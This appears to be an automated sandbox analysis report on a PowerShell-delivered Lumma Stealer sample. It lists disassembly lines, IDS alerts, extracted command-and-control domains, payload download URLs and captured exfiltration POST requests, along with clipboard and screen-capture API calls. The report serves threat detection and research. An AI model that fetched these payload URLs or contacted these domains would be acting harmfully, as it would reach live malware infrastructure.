Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then movzx ecx, byte ptr [ebp+eax+00h]	8_2_004FA8B0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then cmp dword ptr [ecx+ebx*8], 4B1BF3DAh	8_2_0052E910
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then mov esi, eax	8_2_0050590C
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 2213E57Fh	8_2_0052A120
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then mov ecx, eax	8_2_005111C0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then mov word ptr [eax], cx	8_2_005111C0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then mov ecx, eax	8_2_005159F0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then mov dword ptr [esi+08h], 00000000h	8_2_004FB188
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then dec ebp	8_2_0052CA70
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then mov byte ptr [edi], al	8_2_0050AA00
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then movzx ebx, byte ptr [esp+ecx-08DA5397h]	8_2_004F9210
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then mov ecx, eax	8_2_004FB2DC
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then mov dword ptr [esi+08h], 00000000h	8_2_004FB2DC
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx+08h]	8_2_004FBAEE
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then cmp cl, 0000002Eh	8_2_00515AE5
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax-6A99DBB9h]	8_2_00515AE5
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then mov dword ptr [esp+04h], eax	8_2_0051BA95
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then mov ebx, dword ptr [edi+04h]	8_2_005192B0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then mov word ptr [eax], 000Ah	8_2_00514B4E
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then movzx eax, byte ptr [ebp+esi-38h]	8_2_00514B4E
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then jmp ebp	8_2_004FA370
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then mov dword ptr [esi+08h], 00000000h	8_2_004FB30C
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then jmp edx	8_2_00511C71
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then add eax, dword ptr [esp+ecx*4+28h]	8_2_004F7410
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then movzx ecx, word ptr [ebp+edi*4+00h]	8_2_004F7410
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then mov dword ptr [esi+08h], 00000000h	8_2_004FB4E6
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then mov dword ptr [esi+08h], 00000000h	8_2_004FB4E6
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then cmp dword ptr [edx+ecx*8], 0827F28Dh	8_2_005044A7
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then mov esi, ebx	8_2_00517560
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then mov ecx, eax	8_2_00517560
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then cmp cl, 0000002Eh	8_2_00515DD7
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax-6A99DBB9h]	8_2_00515DD7
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then mov edx, ecx	8_2_004F95D0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then movzx ebx, byte ptr [eax+edx]	8_2_0050DDB0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then mov byte ptr [esi], al	8_2_005075BE
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then movzx edx, byte ptr [eax+ecx+6B6EEEC4h]	8_2_0052CDA0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then movzx edi, byte ptr [ecx+esi-0D9327CAh]	8_2_0052CDA0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], EACC7C31h	8_2_00505E4D
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then mov esi, dword ptr [ebp+0Ch]	8_2_00505E4D
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then jmp dword ptr [00534C10h]	8_2_00517E01
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then mov ecx, eax	8_2_0052AE2E
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then movzx esi, byte ptr [esp+ecx+02h]	8_2_0052AE2E
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then mov ecx, eax	8_2_0052AE2E
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then movzx edx, byte ptr [eax+ecx+6B6EEEC4h]	8_2_0052CEC0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then movzx edi, byte ptr [ecx+esi-0D9327CAh]	8_2_0052CEC0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then cmp word ptr [edi+ebx+02h], 0000h	8_2_0052D6F0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then movzx ebx, byte ptr [esi+eax+58h]	8_2_0050A690
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then movzx ecx, byte ptr [ebx+eax-1E5C1D94h]	8_2_00518751
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then mov byte ptr [edi], al	8_2_004F8F60
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then movzx ebx, byte ptr [edx]	8_2_00523FF2
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then cmp byte ptr [esi+ebx], 00000000h	8_2_005197E0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then cmp dword ptr [ebx+esi*8], DA026237h	8_2_00511FB0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then movzx ebx, byte ptr [esp+ebp+2DBB26ABh]	8_2_005147B0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then cmp dword ptr [ebx+esi*8], DA026237h	8_2_00511FAE

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.5:49936 -> 104.21.80.1:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49936 -> 104.21.80.1:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:49931 -> 104.21.80.1:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49931 -> 104.21.80.1:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49975 -> 104.21.80.1:443
Source: Network traffic	Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.5:49969 -> 104.21.80.1:443

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: rebuildeso.buzz
Source: Malware configuration extractor	URLs: crackerdolk.click
Source: Malware configuration extractor	URLs: hummskitnj.buzz
Source: Malware configuration extractor	URLs: appliacnesot.buzz
Source: Malware configuration extractor	URLs: cashfuzysao.buzz
Source: Malware configuration extractor	URLs: inherineau.buzz
Source: Malware configuration extractor	URLs: scentniej.buzz
Source: Malware configuration extractor	URLs: prisonyfork.buzz
Source: Malware configuration extractor	URLs: screwamusresz.buzz

Source: global traffic

HTTP traffic detected: GET /vankok.vstx HTTP/1.1Host: cdn1.klipbazyxui.shopConnection: Keep-Alive

Source: Joe Sandbox View	IP Address: 185.161.251.21 185.161.251.21
Source: Joe Sandbox View	IP Address: 104.21.80.1 104.21.80.1

Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View	JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49931 -> 104.21.80.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49945 -> 104.21.80.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49957 -> 104.21.80.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49951 -> 104.21.80.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49936 -> 104.21.80.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49969 -> 104.21.80.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49965 -> 104.21.80.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49975 -> 104.21.80.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49982 -> 185.161.251.21:443

Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: crackerdolk.click
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 78Host: crackerdolk.click
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=3E5I09CJ5Y2HCVUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12810Host: crackerdolk.click
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=5P599PVXUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15016Host: crackerdolk.click
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=DEXSTRMOARUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20518Host: crackerdolk.click
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=SIAS21YXWH20User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1218Host: crackerdolk.click
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=2LCF5MWZE75RL6K0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1099Host: crackerdolk.click
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 113Host: crackerdolk.click
Source: global traffic	HTTP traffic detected: GET /8574262446/ph.txt HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: cegu.shop

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /vankok.vstx HTTP/1.1Host: cdn1.klipbazyxui.shopConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /8574262446/ph.txt HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: cegu.shop

Source: global traffic	DNS traffic detected: DNS query: cdn1.klipbazyxui.shop
Source: global traffic	DNS traffic detected: DNS query: crackerdolk.click
Source: global traffic	DNS traffic detected: DNS query: cegu.shop

Source: unknown

HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: crackerdolk.click

Source: powershell.exe, 00000002.00000002.2152519562.0000000007930000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.microsoftkC0
Source: powershell.exe, 00000002.00000002.2150261322.00000000061EC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.3274235725.0000000005BEC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000004.00000002.3274235725.0000000004CD8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000002.00000002.2147721025.0000000005181000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.3274235725.0000000004B81000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000004.00000002.3274235725.0000000004CD8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000002.00000002.2147721025.0000000005181000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.3274235725.0000000004B81000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore6lBjq
Source: powershell.exe, 00000004.00000002.3274235725.0000000004CD8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn1.klipbazyxui.shop
Source: powershell.exe, 00000004.00000002.3274235725.0000000004B81000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn1.klipbazyxui.shop/vankok.vstx
Source: powershell.exe, 00000008.00000002.4462317019.000000000069C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cegu.shop/
Source: powershell.exe, 00000008.00000002.4462317019.000000000069C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.4462317019.00000000006CB000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.4460679156.00000000004AB000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: https://cegu.shop/8574262446/ph.txt
Source: powershell.exe, 00000004.00000002.3274235725.0000000005BEC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000004.00000002.3274235725.0000000005BEC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000004.00000002.3274235725.0000000005BEC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000008.00000002.4466139663.0000000004C88000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://crackerdolk.click/
Source: powershell.exe, 00000008.00000002.4466139663.0000000004C88000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://crackerdolk.click/api
Source: powershell.exe, 00000008.00000002.4465039949.0000000000738000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://crackerdolk.click/api-
Source: powershell.exe, 00000008.00000002.4466139663.0000000004C88000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://crackerdolk.click/apiH
Source: powershell.exe, 00000008.00000002.4466139663.0000000004C88000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://crackerdolk.click/i
Source: powershell.exe, 00000008.00000002.4466139663.0000000004C88000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://crackerdolk.click/r
Source: powershell.exe, 00000008.00000002.4466139663.0000000004C88000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://crackerdolk.click/wn
Source: powershell.exe, 00000008.00000002.4465996133.0000000004C63000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.4465916292.0000000004BE0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.4466139663.0000000004C88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.4463612198.00000000006D8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dfgh.online/invoker.php?compName=
Source: powershell.exe, 00000004.00000002.3274235725.0000000004CD8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000004.00000002.3303123052.0000000006F60000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://github.com/mgravell/protobuf-net
Source: powershell.exe, 00000004.00000002.3303123052.0000000006F60000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://github.com/mgravell/protobuf-netJ
Source: powershell.exe, 00000004.00000002.3303123052.0000000006F60000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://github.com/mgravell/protobuf-neti
Source: powershell.exe, 00000008.00000002.4464750397.000000000071F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://klipvumisui.shop/int_clp_sha.txt
Source: powershell.exe, 00000008.00000002.4464750397.000000000071F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://klipvumisui.shop/int_clp_sha.txtZR
Source: powershell.exe, 00000008.00000002.4464750397.000000000071F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://klipvumisui.shop/int_clp_sha.txts=Rc
Source: powershell.exe, 00000002.00000002.2150261322.00000000061EC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.3274235725.0000000005BEC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000004.00000002.3303123052.0000000006F60000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/11564914/23354;
Source: powershell.exe, 00000004.00000002.3303123052.0000000006F60000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/14436606/23354
Source: powershell.exe, 00000004.00000002.3303123052.0000000006F60000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/2152978/23354

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49931
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49975
Source: unknown	Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49951
Source: unknown	Network traffic detected: HTTP traffic on port 49945 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49969 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49982
Source: unknown	Network traffic detected: HTTP traffic on port 49951 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49975 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49931 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49936 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49957 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49982 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49965 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49936
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49969
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49957
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49945
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49965

Source: unknown	HTTPS traffic detected: 104.21.72.190:443 -> 192.168.2.5:49709 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.5:49931 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.5:49936 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.5:49945 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.5:49951 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.5:49957 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.5:49965 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.5:49969 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.5:49975 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.161.251.21:443 -> 192.168.2.5:49982 version: TLS 1.2

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Code function: 8_2_00521740 OpenClipboard,GetClipboardData,GlobalLock,GetWindowLongW,GlobalUnlock,CloseClipboard,

8_2_00521740

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Code function: 8_2_00521740 OpenClipboard,GetClipboardData,GlobalLock,GetWindowLongW,GlobalUnlock,CloseClipboard,

8_2_00521740

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Code function: 8_2_005221CA GetDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,

8_2_005221CA

System Summary

Malicious sample detected (through community Yara rule)

Source: Process Memory Space: powershell.exe PID: 6624, type: MEMORYSTR	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 7464, type: MEMORYSTR	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process Stats: CPU usage > 49%

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_04D5CB78	2_2_04D5CB78
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_04D5D448	2_2_04D5D448
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_04D5C830	2_2_04D5C830
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_00B9738F	4_2_00B9738F
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_00B9A539	4_2_00B9A539
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_00B9A548	4_2_00B9A548
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_00B94660	4_2_00B94660
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_00B94650	4_2_00B94650
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_0465AAB3	4_2_0465AAB3
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_04654438	4_2_04654438
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_04659120	4_2_04659120
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_0465EC70	4_2_0465EC70
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_04657AE0	4_2_04657AE0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_04657AF0	4_2_04657AF0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_04653AA3	4_2_04653AA3
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_04653AA8	4_2_04653AA8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_0466B720	4_2_0466B720
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_0466CFC0	4_2_0466CFC0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_075721D0	4_2_075721D0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_081E7350	4_2_081E7350
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_081E7818	4_2_081E7818
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_081E0006	4_2_081E0006
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_081E0028	4_2_081E0028
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_081E0040	4_2_081E0040
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_081E609C	4_2_081E609C
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_081E60A8	4_2_081E60A8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_081E6D1C	4_2_081E6D1C
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_081E59F8	4_2_081E59F8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_081E6A6A	4_2_081E6A6A
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_081E7341	4_2_081E7341
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_081E67D9	4_2_081E67D9
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_081E67E0	4_2_081E67E0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_004FD071	8_2_004FD071
